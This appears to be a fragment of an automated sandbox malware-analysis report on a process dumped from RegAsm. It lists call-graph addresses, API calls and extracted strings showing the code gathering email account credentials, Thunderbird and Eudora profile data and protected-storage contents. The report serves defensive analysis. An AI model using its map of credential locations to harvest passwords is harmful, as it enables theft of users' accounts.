33853->33850 33853->33851 33856 402bb8 33853->33856 34009 410a9c RegOpenKeyExA 33853->34009 34010 402a9d memset 33853->34010 34018 410b62 RegEnumKeyExA 33853->34018 33856->33850 33857->33733 33858->33737 34058 410a9c RegOpenKeyExA 33859->34058 33861 402ff9 33862 403006 memset 33861->33862 33863 40312c 33861->33863 34059 410b62 RegEnumKeyExA 33862->34059 33863->33746 33865 403122 RegCloseKey 33865->33863 33866 410b1e 3 API calls 33867 403058 memset sprintf 33866->33867 34060 410a9c RegOpenKeyExA 33867->34060 33869 4030a2 memset 34061 410b62 RegEnumKeyExA 33869->34061 33871 4030f9 RegCloseKey 33873 403033 33871->33873 33873->33865 33873->33866 33873->33869 33873->33871 33874 410b62 RegEnumKeyExA 33873->33874 34062 402db3 26 API calls 33873->34062 33874->33873 33876 4032d5 33875->33876 33877 4033a9 33875->33877 34063 4021b6 memset 33876->34063 33890 4034e4 memset memset 33877->33890 33879 4032e1 34064 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33879->34064 33881 4032ea 33882 4032f8 memset GetPrivateProfileSectionA 33881->33882 34065 4023e5 16 API calls 33881->34065 33882->33877 33887 40332f 33882->33887 33884 40339b strlen 33884->33877 33884->33887 33886 403350 strchr 33886->33887 33887->33877 33887->33884 34066 4021b6 memset 33887->34066 34067 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33887->34067 34068 4023e5 16 API calls 33887->34068 33891 410b1e 3 API calls 33890->33891 33892 40353f 33891->33892 33893 40357f 33892->33893 33894 403546 _mbscpy 33892->33894 33898 403985 33893->33898 34069 406d55 strlen _mbscat 33894->34069 33896 403565 _mbscat 34070 4033f0 19 API calls 33896->34070 34071 40466b _mbscpy 33898->34071 33900 4039aa 33904 4039ff 33900->33904 34072 40f460 memset memset 33900->34072 34093 40f6e2 33900->34093 34109 4038e8 21 API calls 33900->34109 33905 404785 FreeLibrary 33904->33905 33906 403a0b 33905->33906 33907 4037ca memset memset 33906->33907 34117 444551 memset 33907->34117 33910 4038e2 33910->33756 33970 40f334 324 API calls 33910->33970 33912 40382e 33913 406f06 2 API calls 33912->33913 33914 403843 33913->33914 33915 406f06 2 API calls 33914->33915 33916 403855 strchr 33915->33916 33917 403884 _mbscpy 33916->33917 33918 403897 strlen 33916->33918 33919 4038bf _mbscpy 33917->33919 33918->33919 33920 4038a4 sprintf 33918->33920 34129 4023e5 16 API calls 33919->34129 33920->33919 33923 44b090 33922->33923 33924 40fb10 RegOpenKeyExA 33923->33924 33925 403e7f 33924->33925 33926 40fb3b 33924->33926 33936 40f96c 33925->33936 33927 40fb55 RegQueryValueExA 33926->33927 33928 40fc2d RegCloseKey 33926->33928 33929 40fc23 RegCloseKey 33927->33929 33930 40fb84 33927->33930 33928->33925 33929->33928 33931 404734 2 API calls 33930->33931 33932 40fb91 33931->33932 33932->33929 33933 40fc19 LocalFree 33932->33933 33934 40fbdd memcpy memcpy 33932->33934 33933->33929 34134 40f802 9 API calls 33934->34134 33937 4070ae GetVersionExA 33936->33937 33938 40f98d 33937->33938 33939 4045db 2 API calls 33938->33939 33947 40f9a9 33939->33947 33940 40fae6 33941 404656 FreeLibrary 33940->33941 33942 403e85 33941->33942 33948 4442ea memset 33942->33948 33943 40fa13 memset WideCharToMultiByte 33944 40fa43 _strnicmp 33943->33944 33943->33947 33945 40fa5b WideCharToMultiByte 33944->33945 33944->33947 33946 40fa88 WideCharToMultiByte 33945->33946 33945->33947 33946->33947 33947->33940 33947->33943 33949 410dbb 9 API calls 33948->33949 33950 444329 33949->33950 34135 40759e strlen strlen 33950->34135 33955 410dbb 9 API calls 33956 444350 33955->33956 33957 40759e 3 API calls 33956->33957 33958 44435a 33957->33958 33959 444212 65 API calls 33958->33959 33960 444366 memset memset 33959->33960 33961 410b1e 3 API calls 33960->33961 33962 4443b9 ExpandEnvironmentStringsA strlen 33961->33962 33963 4443f4 _strcmpi 33962->33963 33964 4443e5 33962->33964 33965 403e91 33963->33965 33966 44440c 33963->33966 33964->33963 33965->33535 33967 444212 65 API calls 33966->33967 33967->33965 33968->33718 33969->33722 33970->33756 33971->33757 33973 40370e 33972->33973 33974 41088d 33972->33974 33973->33772 33973->33773 33974->33973 33975 4108be memcpy CoTaskMemFree 33974->33975 33975->33973 33976->33776 33977->33772 33979 40841c 33978->33979 33980 410a9c RegOpenKeyExA 33979->33980 33980->33785 33981->33791 33982->33791 33983->33795 33984->33797 33985->33791 33986->33800 33987->33804 33988->33804 33989->33809 33990->33804 33992 404656 FreeLibrary 33991->33992 33993 4045e3 LoadLibraryA 33992->33993 33994 404643 33993->33994 33995 4045f4 33993->33995 33994->33814 33994->33816 33994->33818 33995->33994 33996 404656 FreeLibrary 33995->33996 33996->33994 33998 403cd2 33997->33998 33999 40465c FreeLibrary 33997->33999 33998->33827 33999->33998 34000->33824 34001->33831 34002->33845 34003->33839 34004->33845 34005->33845 34006->33840 34007->33845 34008->33853 34009->33853 34019 410b62 RegEnumKeyExA 34010->34019 34012 402ad0 34013 402b15 RegCloseKey 34012->34013 34017 402b14 34012->34017 34020 410a9c RegOpenKeyExA 34012->34020 34021 402a14 memset 34012->34021 34029 410b62 RegEnumKeyExA 34012->34029 34013->33853 34017->34013 34018->33853 34019->34012 34020->34012 34030 410b62 RegEnumKeyExA 34021->34030 34023 402a93 RegCloseKey 34023->34012 34025 402a48 34025->34023 34031 410a9c RegOpenKeyExA 34025->34031 34032 4027be 34025->34032 34047 410b62 RegEnumKeyExA 34025->34047 34029->34012 34030->34025 34031->34025 34033 40285a memset 34032->34033 34048 4029a2 RegQueryValueExA 34033->34048 34035 402885 34035->34033 34036 402998 RegCloseKey 34035->34036 34054 4021b6 memset 34035->34054 34036->34025 34038 402898 _mbscpy 34039 4029a2 4 API calls 34038->34039 34043 4028d4 34039->34043 34040 4029a2 RegQueryValueExA WideCharToMultiByte strlen memcpy 34040->34043 34041 410ab6 RegQueryValueExA 34041->34043 34043->34040 34043->34041 34055 401989 _mbscpy _mbscat _mbscat 34043->34055 34056 402624 10 API calls 34043->34056 34045 40296d _mbscpy 34057 4023e5 16 API calls 34045->34057 34047->34025 34049 4029f2 34048->34049 34050 4029dd 34048->34050 34049->34035 34051 4029f7 WideCharToMultiByte 34050->34051 34052 4029e9 34050->34052 34051->34049 34053 406f06 2 API calls 34052->34053 34053->34049 34054->34038 34055->34043 34056->34045 34057->34035 34058->33861 34059->33873 34060->33873 34061->33873 34062->33873 34063->33879 34064->33881 34065->33882 34066->33886 34067->33887 34068->33887 34069->33896 34070->33893 34071->33900 34110 4078ba 34072->34110 34075 4078ba _mbsnbcat 34076 40f5a3 RegOpenKeyExA 34075->34076 34077 40f5c3 RegQueryValueExA 34076->34077 34078 40f6d9 34076->34078 34079 40f6d0 RegCloseKey 34077->34079 34080 40f5f0 34077->34080 34078->33900 34079->34078 34080->34079 34090 40f675 34080->34090 34114 40466b _mbscpy 34080->34114 34082 40f611 34084 404734 2 API calls 34082->34084 34088 40f616 34084->34088 34085 40f69e RegQueryValueExA 34085->34079 34087 40f6c1 34085->34087 34086 40f66a 34089 404785 FreeLibrary 34086->34089 34087->34079 34088->34086 34091 40f661 LocalFree 34088->34091 34092 40f645 memcpy 34088->34092 34089->34090 34090->34079 34115 4012ee strlen 34090->34115 34091->34086 34092->34091 34116 40466b _mbscpy 34093->34116 34095 40f6fa 34096 4045db 2 API calls 34095->34096 34097 40f708 34096->34097 34098 40f7e2 34097->34098 34099 404734 2 API calls 34097->34099 34100 404656 FreeLibrary 34098->34100 34104 40f715 34099->34104 34101 40f7f1 34100->34101 34102 404785 FreeLibrary 34101->34102 34103 40f7fc 34102->34103 34103->33900 34104->34098 34105 40f797 WideCharToMultiByte 34104->34105 34106 40f7b8 strlen 34105->34106 34107 40f7d9 LocalFree 34105->34107 34106->34107 34108 40f7c8 _mbscpy 34106->34108 34107->34098 34108->34107 34109->33900 34111 4078e6 34110->34111 34112 4078c7 _mbsnbcat 34111->34112 34113 4078ea 34111->34113 34112->34111 34113->34075 34114->34082 34115->34085 34116->34095 34130 410a9c RegOpenKeyExA 34117->34130 34119 44458b 34120 40381a 34119->34120 34131 410add RegQueryValueExA 34119->34131 34120->33910 34128 4021b6 memset 34120->34128 34122 4445a4 34123 4445dc RegCloseKey 34122->34123 34132 410add RegQueryValueExA 34122->34132 34123->34120 34125 4445c1 34125->34123 34133 444879 30 API calls 34125->34133 34127 4445da 34127->34123 34128->33912 34129->33910 34130->34119 34131->34122 34132->34125 34133->34127 34134->33933 34136 4075c9 34135->34136 34137 4075bb _mbscat 34135->34137 34138 444212 34136->34138 34137->34136 34154 407e9d 34138->34154 34141 44424d 34142 444274 34141->34142 34162 444196 34141->34162 34173 407ef8 34141->34173 34143 407e9d 9 API calls 34142->34143 34146 4442a0 34143->34146 34145 407ef8 9 API calls 34145->34146 34146->34145 34147 4442ce 34146->34147 34153 444212 65 API calls 34146->34153 34183 407e62 34146->34183 34187 407f90 34147->34187 34151 407f90 FindClose 34152 4442e4 34151->34152 34152->33955 34153->34146 34155 407f90 FindClose 34154->34155 34156 407eaa 34155->34156 34157 406f06 2 API calls 34156->34157 34158 407ebd strlen strlen 34157->34158 34159 407ee1 34158->34159 34160 407eea 34158->34160 34190 4070e3 strlen _mbscat _mbscpy _mbscat 34159->34190 34160->34141 34191 406d01 CreateFileA 34162->34191 34164 4441a1 34165 44420e 34164->34165 34166 4441aa GetFileSize 34164->34166 34165->34141 34167 444203 CloseHandle 34166->34167 34168 4441bd ??2@YAPAXI SetFilePointer 34166->34168 34167->34165 34192 407560 ReadFile 34168->34192 34170 4441e4 34193 444059 34170->34193 34174 407f03 FindFirstFileA 34173->34174 34175 407f24 FindNextFileA 34173->34175 34176 407f3f 34174->34176 34177 407f46 strlen strlen 34175->34177 34178 407f3a 34175->34178 34176->34177 34182 407f7f 34176->34182 34180 407f76 34177->34180 34177->34182 34179 407f90 FindClose 34178->34179 34179->34176 34224 4070e3 strlen _mbscat _mbscpy _mbscat 34180->34224 34182->34141 34184 407e94 34183->34184 34185 407e6c strcmp 34183->34185 34184->34146 34185->34184 34186 407e83 strcmp 34185->34186 34186->34184 34188 407fa3 34187->34188 34189 407f99 FindClose 34187->34189 34188->34151 34189->34188 34190->34160 34191->34164 34192->34170 34194 44b090 34193->34194 34195 444066 wcslen ??2@YAPAXI WideCharToMultiByte 34194->34195 34208 44338b 6 API calls 34195->34208 34197 44409f 34198 4440bf strlen 34197->34198 34209 4434fc ??3@YAXPAX ??2@YAPAXI 34198->34209 34200 4440df memcpy 34210 443607 34200->34210 34202 44413d ??3@YAXPAX 34220 443473 9 API calls 34202->34220 34205 406f06 2 API calls 34205->34202 34207 44418f ??3@YAXPAX 34207->34167 34208->34197 34209->34200 34221 407948 free free 34210->34221 34212 443639 34222 407948 free free 34212->34222 34214 44391c 34214->34202 34214->34205 34215 407a1f 4 API calls 34217 443644 34215->34217 34216 443528 19 API calls 34216->34217 34217->34214 34217->34215 34217->34216 34218 44379d memcpy 34217->34218 34223 442d8e 9 API calls 34217->34223 34218->34217 34220->34207 34221->34212 34222->34217 34223->34217 34224->34182 34225->33550 34226->33554 34227->33561 34228->33560 34229->33567 34230->33564 34231->33559 34249 411853 RtlInitializeCriticalSection memset 34250 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34425 40a256 13 API calls 34427 432e5b 17 API calls 34429 43fa5a 20 API calls 34252 401060 41 API calls 34432 427260 CloseHandle memset memset 34256 410c68 FindResourceA SizeofResource LoadResource LockResource 34434 405e69 13 API calls 34258 433068 15 API calls __fprintf_l 34436 414a6d 18 API calls 34437 43fe6f 134 API calls 34260 424c6d 15 API calls __fprintf_l 34438 426741 19 API calls 34262 440c70 17 API calls 34263 443c71 43 API calls 34266 427c79 24 API calls 34441 416e7e memset __fprintf_l 34270 42800b 47 API calls 34271 425115 85 API calls __fprintf_l 34444 41960c 61 API calls 34272 43f40c 122 API calls __fprintf_l 34275 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34276 43f81a 20 API calls 34278 414c20 memset memset 34279 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34448 414625 18 API calls 34449 404225 modf 34450 403a26 strlen WriteFile 34452 40422a 12 API calls 34456 427632 memset memset memcpy 34457 40ca30 59 API calls 34458 404235 26 API calls 34280 42ec34 61 API calls __fprintf_l 34281 425115 76 API calls __fprintf_l 34459 425115 77 API calls __fprintf_l 34461 44223a 38 API calls 34287 43183c 112 API calls 34462 44b2c5 _onexit __dllonexit 34467 42a6d2 memcpy __allrem 34289 405cda 65 API calls 34475 43fedc 138 API calls 34476 4116e1 16 API calls __fprintf_l 34292 4244e6 19 API calls 34294 42e8e8 127 API calls __fprintf_l 34295 4118ee RtlLeaveCriticalSection 34481 43f6ec 22 API calls 34297 425115 119 API calls __fprintf_l 34298 410cf3 EnumResourceNamesA 34484 4492f0 memcpy memcpy 34486 43fafa 18 API calls 34488 4342f9 15 API calls __fprintf_l 34299 4144fd 19 API calls 34490 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34491 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34494 443a84 _mbscpy 34496 43f681 17 API calls 34302 404487 22 API calls 34498 415e8c 16 API calls __fprintf_l 34306 411893 RtlDeleteCriticalSection __fprintf_l 34307 41a492 42 API calls 34502 403e96 34 API calls 34503 410e98 memset SHGetPathFromIDList SendMessageA 34309 426741 109 API calls __fprintf_l 34310 4344a2 18 API calls 34311 4094a2 10 API calls 34506 4116a6 15 API calls __fprintf_l 34507 43f6a4 17 API calls 34508 440aa3 20 API calls 34510 427430 45 API calls 34314 4090b0 7 API calls 34315 4148b0 15 API calls 34317 4118b4 RtlEnterCriticalSection 34318 4014b7 CreateWindowExA 34319 40c8b8 19 API calls 34321 4118bf RtlTryEnterCriticalSection 34515 42434a 18 API calls __fprintf_l 34517 405f53 12 API calls 34329 43f956 59 API calls 34331 40955a 17 API calls 34332 428561 36 API calls 34333 409164 7 API calls 34521 404366 19 API calls 34525 40176c ExitProcess 34528 410777 42 API calls 34338 40dd7b 51 API calls 34339 425d7c 16 API calls __fprintf_l 34530 43f6f0 25 API calls 34531 42db01 22 API calls 34340 412905 15 API calls __fprintf_l 34532 403b04 54 API calls 34533 405f04 SetDlgItemTextA GetDlgItemTextA 34534 44b301 ??3@YAXPAX 34537 4120ea 14 API calls 3 library calls 34538 40bb0a 8 API calls 34540 413f11 strcmp 34344 434110 17 API calls __fprintf_l 34347 425115 108 API calls __fprintf_l 34541 444b11 _onexit 34349 425115 76 API calls __fprintf_l 34352 429d19 10 API calls 34544 444b1f __dllonexit 34545 409f20 _strcmpi 34354 42b927 31 API calls 34548 433f26 19 API calls __fprintf_l 34549 44b323 FreeLibrary 34550 427f25 46 API calls 34551 43ff2b 17 API calls 33219 444b36 33222 444b10 33219->33222 33221 444b3f 33223 444b1f __dllonexit 33222->33223 33224 444b19 _onexit 33222->33224 33223->33221 33224->33223 34552 43fb30 19 API calls 34361 414d36 16 API calls 34363 40ad38 7 API calls 34554 433b38 16 API calls __fprintf_l 34232 44b33b 34233 44b344 ??3@YAXPAX 34232->34233 34234 44b34b 34232->34234 34233->34234 34235 44b354 ??3@YAXPAX 34234->34235 34236 44b35b 34234->34236 34235->34236 34237 44b364 ??3@YAXPAX 34236->34237 34238 44b36b 34236->34238 34237->34238 34239 44b374 ??3@YAXPAX 34238->34239 34240 44b37b 34238->34240 34239->34240 34367 426741 21 API calls 34368 40c5c3 124 API calls 34370 43fdc5 17 API calls 34555 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34373 4161cb memcpy memcpy memcpy memcpy 33234 44b3cf 33235 44b3e6 33234->33235 33237 44b454 33234->33237 33235->33237 33241 44b40e 33235->33241 33238 44b405 33238->33237 33239 44b435 VirtualProtect 33238->33239 33239->33237 33240 44b444 VirtualProtect 33239->33240 33240->33237 33242 44b413 33241->33242 33247 44b454 33242->33247 33248 44b42b 33242->33248 33244 44b41c 33245 44b435 VirtualProtect 33244->33245 33244->33247 33246 44b444 VirtualProtect 33245->33246 33245->33247 33246->33247 33249 44b431 33248->33249 33250 44b435 VirtualProtect 33249->33250 33251 44b454 33249->33251 33250->33251 33252 44b444 VirtualProtect 33250->33252 33252->33251 34560 43ffc8 18 API calls 34374 4281cc 15 API calls __fprintf_l 34562 4383cc 110 API calls __fprintf_l 34375 4275d3 41 API calls 34563 4153d3 22 API calls __fprintf_l 34376 444dd7 _XcptFilter 34568 4013de 15 API calls 34570 425115 111 API calls __fprintf_l 34571 43f7db 18 API calls 34574 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34378 4335ee 16 API calls __fprintf_l 34576 429fef 11 API calls 34379 444deb _exit _c_exit 34577 40bbf0 138 API calls 34382 425115 79 API calls __fprintf_l 34581 437ffa 22 API calls 34386 4021ff 14 API calls 34387 43f5fc 149 API calls 34582 40e381 9 API calls 34389 405983 40 API calls 34390 42b186 27 API calls __fprintf_l 34391 427d86 76 API calls 34392 403585 20 API calls 34394 42e58e 18 API calls __fprintf_l 34397 425115 75 API calls __fprintf_l 34399 401592 8 API calls 33225 410b92 33228 410a6b 33225->33228 33227 410bb2 33229 410a77 33228->33229 33230 410a89 GetPrivateProfileIntA 33228->33230 33233 410983 memset _itoa WritePrivateProfileStringA 33229->33233 33230->33227 33232 410a84 33232->33227 33233->33232 34586 434395 16 API calls 34401 441d9c memcmp 34588 43f79b 119 API calls 34402 40c599 32 API calls 34589 426741 87 API calls 34406 4401a6 21 API calls 34408 426da6 memcpy memset memset memcpy 34409 4335a5 15 API calls 34411 4299ab memset memset memcpy memset memset 34412 40b1ab 8 API calls 34594 425115 76 API calls __fprintf_l 34598 4113b2 18 API calls 2 library calls 34602 40a3b8 memset sprintf SendMessageA 33253 410bbc 33256 4109cf 33253->33256 33257 4109dc 33256->33257 33258 410a23 memset GetPrivateProfileStringA 33257->33258 33259 4109ea memset 33257->33259 33264 407646 strlen 33258->33264 33269 4075cd sprintf memcpy 33259->33269 33262 410a0c WritePrivateProfileStringA 33263 410a65 33262->33263 33265 40765a 33264->33265 33266 40765c 33264->33266 33265->33263 33268 4076a3 33266->33268 33270 40737c strtoul 33266->33270 33268->33263 33269->33262 33270->33266 34414 40b5bf memset memset _mbsicmp

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 159 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 160 408450-408453 159->160 161 40841c 159->161 163 408484-408488 160->163 164 408455-40845e 160->164 162 408422-40842b 161->162 165 408432-40844e 162->165 166 40842d-408431 162->166 167 408460-408464 164->167 168 408465-408482 164->168 165->160 165->162 166->165 167->168 168->163 168->164
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040832F
                                                                                                                                              • memset.MSVCRT ref: 00408343
                                                                                                                                              • memset.MSVCRT ref: 0040835F
                                                                                                                                              • memset.MSVCRT ref: 00408376
                                                                                                                                              • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                              • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                              • strlen.MSVCRT ref: 004083E9
                                                                                                                                              • strlen.MSVCRT ref: 004083F8
                                                                                                                                              • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                              • String ID: 5$H$O$b$i$}$}
                                                                                                                                              • API String ID: 1832431107-3760989150
                                                                                                                                              • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                                              • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                                                              • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                                              • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                                                              • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                                                              • strlen.MSVCRT ref: 00407F5C
                                                                                                                                              • strlen.MSVCRT ref: 00407F64
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFindstrlen$FirstNext
                                                                                                                                              • String ID: ACD
                                                                                                                                              • API String ID: 379999529-620537770
                                                                                                                                              • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                                              • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                                                              • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                                              • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00401E8B
                                                                                                                                                • Part of subcall function 00410DBB: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                              • strlen.MSVCRT ref: 00401EA4
                                                                                                                                              • strlen.MSVCRT ref: 00401EB2
                                                                                                                                              • strlen.MSVCRT ref: 00401EF8
                                                                                                                                              • strlen.MSVCRT ref: 00401F06
                                                                                                                                              • memset.MSVCRT ref: 00401FB1
                                                                                                                                              • atoi.MSVCRT(?), ref: 00401FE0
                                                                                                                                              • memset.MSVCRT ref: 00402003
                                                                                                                                              • sprintf.MSVCRT ref: 00402030
                                                                                                                                                • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                              • memset.MSVCRT ref: 00402086
                                                                                                                                              • memset.MSVCRT ref: 0040209B
                                                                                                                                              • strlen.MSVCRT ref: 004020A1
                                                                                                                                              • strlen.MSVCRT ref: 004020AF
                                                                                                                                              • strlen.MSVCRT ref: 004020E2
                                                                                                                                              • strlen.MSVCRT ref: 004020F0
                                                                                                                                              • memset.MSVCRT ref: 00402018
                                                                                                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                              • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                                                                                • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileFolderPathSpecialStrings_mbscatatoisprintf
                                                                                                                                              • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                              • API String ID: 52128907-4223776976
                                                                                                                                              • Opcode ID: 0586a96bd1dd566e4e6b01723853c75a2a65919309edaf857d44129f31cda3b9
                                                                                                                                              • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                                                              • Opcode Fuzzy Hash: 0586a96bd1dd566e4e6b01723853c75a2a65919309edaf857d44129f31cda3b9
                                                                                                                                              • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00402869
                                                                                                                                                • Part of subcall function 004029A2: RegQueryValueExA.KERNEL32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                              • _mbscpy.MSVCRT(?,?,770145ED,?,00000000), ref: 004028A3
                                                                                                                                                • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,770145ED,?,00000000), ref: 0040297B
                                                                                                                                                • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                              • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                              • API String ID: 1497257669-167382505
                                                                                                                                              • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                              • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                                                              • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                              • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                                                • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                                                • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                                                              • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Library$??3@DeleteFreeLoadMessageObject
                                                                                                                                              • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                              • API String ID: 910260487-375988210
                                                                                                                                              • Opcode ID: d6132907f4b3170a7015f464395200ce2fd6d1b2519e675daeb85491024fb36d
                                                                                                                                              • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                                                              • Opcode Fuzzy Hash: d6132907f4b3170a7015f464395200ce2fd6d1b2519e675daeb85491024fb36d
                                                                                                                                              • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                              • LoadLibraryA.KERNEL32(pstorec.dll), ref: 00403C35
                                                                                                                                              • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                                                              Strings
                                                                                                                                              • pstorec.dll, xrefs: 00403C30
